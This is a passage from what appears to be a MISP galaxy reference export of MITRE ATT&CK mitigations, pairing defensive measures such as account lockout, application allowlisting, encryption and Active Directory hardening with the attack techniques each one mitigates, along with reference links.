mitigates: misp-galaxy:mitre-attack-pattern="Network Traffic Capture or Redirection - T1410" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Manipulate Device Communication - T1463" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exploit SS7 to Redirect Phone Calls/SMS - T1449" with estimative-language:likelihood-probability="almost-certain"

Table 4187. Table References
Links
https://attack.mitre.org/mitigations/M1009
https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/
https://developer.android.com/training/articles/security-config.html

Brute Force Mitigation - T1110

Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy can create a denial of service condition and render environments un-usable, with all accounts being locked-out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078)

Refer to NIST guidelines when creating passwords.(Citation: NIST 800-63-3)

Where possible, also enable multi factor authentication on external facing services.

The tag is: misp-galaxy:mitre-course-of-action="Brute Force Mitigation - T1110"

View relationships graph

Brute Force Mitigation - T1110 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 4188. Table References
Links
https://attack.mitre.org/mitigations/T1110
https://pages.nist.gov/800-63-3/sp800-63b.html

Query Registry Mitigation - T1012

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Query Registry Mitigation - T1012"

View relationships graph

Query Registry Mitigation - T1012 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 4189. Table References
Links
https://attack.mitre.org/mitigations/T1012
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Web Service Mitigation - T1102

Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol or encoded commands used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Web Service Mitigation - T1102"

View relationships graph

Web Service Mitigation - T1102 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 4190. Table References
Links
https://attack.mitre.org/mitigations/T1102
https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

Application Developer Guidance - M1013

This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.

The tag is: misp-galaxy:mitre-course-of-action="Application Developer Guidance - M1013"

View relationships graph

Application Developer Guidance - M1013 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1574" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1547.011" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Resource Forking - T1564.009" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1513" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Notifications - T1517" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="URI Hijacking - T1416" with estimative-language:likelihood-probability="almost-certain"

Table 4191. Table References
Links
https://attack.mitre.org/mitigations/M1013

AppInit DLLs Mitigation - T1103

Upgrade to Windows 8 or later and enable secure boot.

Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppInit DLLs Mitigation - T1103"

View relationships graph

AppInit DLLs Mitigation - T1103 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 4192. Table References
Links
https://attack.mitre.org/mitigations/T1103
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

Network Intrusion Prevention - M1031

Use intrusion detection signatures to block traffic at network boundaries.

The tag is: misp-galaxy:mitre-course-of-action="Network Intrusion Prevention - M1031"

View relationships graph

Network Intrusion Prevention - M1031 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Custom Command and Control Protocol - T1094" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Custom Cryptographic Protocol - T1024" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Encoding - T1132" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over C2 Channel - T1041" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1483" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Multi-Stage Channels - T1104" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Standard Cryptographic Protocol - T1032" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Non-Application Layer Protocol - T1095" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1193" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Alternative Protocol - T1048" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Phishing - T1566" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Generation Algorithms - T1568.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Lateral Tool Transfer - T1570" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dynamic Resolution - T1568" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Non-Standard Port - T1571" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="One-Way Communication - T1102.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Internal Proxy - T1090.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="External Proxy - T1090.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Non-Standard Encoding - T1132.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Junk Data - T1001.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steganography - T1001.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Protocol Impersonation - T1001.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Symmetric Encrypted Non-C2 Protocol - T1048.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Asymmetric Encrypted Non-C2 Protocol - T1048.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File Transfer Protocols - T1071.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Mail Protocols - T1071.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DNS - T1071.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Encrypted Channel - T1573" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="LLMNR/NBT-NS Poisoning and SMB Relay - T1557.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ROMMONkit - T1542.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Malicious Image - T1204.003" with estimative-language:likelihood-probability="almost-certain"

Table 4193. Table References
Links
https://attack.mitre.org/mitigations/M1031

Port Monitors Mitigation - T1013

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.

The tag is: misp-galaxy:mitre-course-of-action="Port Monitors Mitigation - T1013"

View relationships graph

Port Monitors Mitigation - T1013 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013" with estimative-language:likelihood-probability="almost-certain"

Table 4194. Table References
Links
https://attack.mitre.org/mitigations/T1013
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

Encrypt Sensitive Information - M1041

Protect sensitive information with strong encryption.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Sensitive Information - M1041"

View relationships graph

Encrypt Sensitive Information - M1041 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1493" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1208" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Removal on Host - T1070" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1145" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Cloud Storage Object - T1530" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Clear Linux or Mac System Logs - T1070.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Application Access Token - T1550.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Email Collection - T1114.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Email Forwarding Rule - T1114.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Kerberoasting - T1558.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data Manipulation - T1565" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="AS-REP Roasting - T1558.004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="ARP Cache Poisoning - T1557.002" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Adversary-in-the-Middle - T1557" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Traffic Duplication - T1020.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Configuration Repository - T1602" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SNMP (MIB Dump) - T1602.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002" with estimative-language:likelihood-probability="almost-certain"

Table 4195. Table References
Links
https://attack.mitre.org/mitigations/M1041

Active Directory Configuration - M1015

Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.

The tag is: misp-galaxy:mitre-course-of-action="Active Directory Configuration - M1015"

View relationships graph

Active Directory Configuration - M1015 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Credentials in Files - T1081" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1178" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Software Deployment Tools - T1072" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Unsecured Credentials - T1552" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SID-History Injection - T1134.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="DCSync - T1003.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Golden Ticket - T1558.001" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Steal or Forge Kerberos Tickets - T1558" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Cached Domain Credentials - T1003.005" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Group Policy Preferences - T1552.006" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002" with estimative-language:likelihood-probability="almost-certain"

Table 4196. Table References
Links
https://attack.mitre.org/mitigations/M1015

Accessibility Features Mitigation - T1015

To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later. (Citation: TechNet RDP NLA)

If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network. (Citation: TechNet RDP Gateway)

Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Accessibility Features Mitigation - T1015"

View relationships graph

Accessibility Features Mitigation - T1015 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"

Table 4197. Table References
Links
https://attack.mitre.org/mitigations/T1015
https://technet.microsoft.com/en-us/library/cc732713.aspx
https://technet.microsoft.com/en-us/library/cc731150.aspx
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

Plist Modification Mitigation - T1150

Prevent plist files from being modified by users by making them read-only.

The tag is: misp-galaxy:mitre-course-of-action="Plist Modification Mitigation - T1150"

View relationships graph

Plist Modification Mitigation - T1150 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150" with estimative-language:likelihood-probability="almost-certain"

Table 4198. Table References
Links
https://attack.mitre.org/mitigations/T1150

Systemd Service Mitigation - T1501

The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services.

The tag is: misp-galaxy:mitre-course-of-action="Systemd Service Mitigation - T1501"

View relationships graph

Systemd Service Mitigation - T1501 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"

Table 4199. Table References
Links
https://attack.mitre.org/mitigations/T1501

Shared Webroot Mitigation - T1051

Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.

Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Secuirty) (Citation: NIST Server Security July 2008)

The tag is: misp-galaxy:mitre-course-of-action="Shared Webroot Mitigation - T1051"

View relationships graph

Shared Webroot Mitigation - T1051 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"

Table 4200. Table References
Links
https://attack.mitre.org/mitigations/T1051
https://www.acunetix.com/websitesecurity/webserver-security/
https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf

Launch Daemon Mitigation - T1160

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.

The tag is: misp-galaxy:mitre-course-of-action="Launch Daemon Mitigation - T1160"

View relationships graph

Launch Daemon Mitigation - T1160 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launchd - T1053.004" with estimative-language:likelihood-probability="almost-certain"

Table 4201. Table References
Links
https://attack.mitre.org/mitigations/T1160

File Deletion Mitigation - T1107

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File Deletion Mitigation - T1107"

View relationships graph

File Deletion Mitigation - T1107 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

Table 4202. Table References
Links
https://attack.mitre.org/mitigations/T1107
http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599
http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html
https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm
http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx
https://technet.microsoft.com/en-us/library/ee791851.aspx

User Account Management - M1018

Manage the creation, modification, use, and permissions associated to user accounts.

The tag is: misp-galaxy:mitre-course-of-action="User Account Management - M1018"

View relationships graph

User Account Management - M1018 has relationships with:

mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1084" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Access Token Manipulation - T1134" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="BITS Jobs - T1197" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Disabling Security Tools - T1089" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Winlogon Helper DLL - T1004" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Dylib Hijacking - T1157" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="File System Permissions Weakness - T1044" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Domain Policy Modification - T1484" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Indicator Blocking - T1054" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launch Agent - T1159" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Launchctl - T1152" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Login Item - T1162" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Browser Session Hijacking - T1185" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Modify Existing Service - T1031" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Hash - T1075" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1097" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Rc.common - T1163" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Desktop Protocol - T1076" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Remote Services - T1021" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Startup Items - T1165" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"
mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"
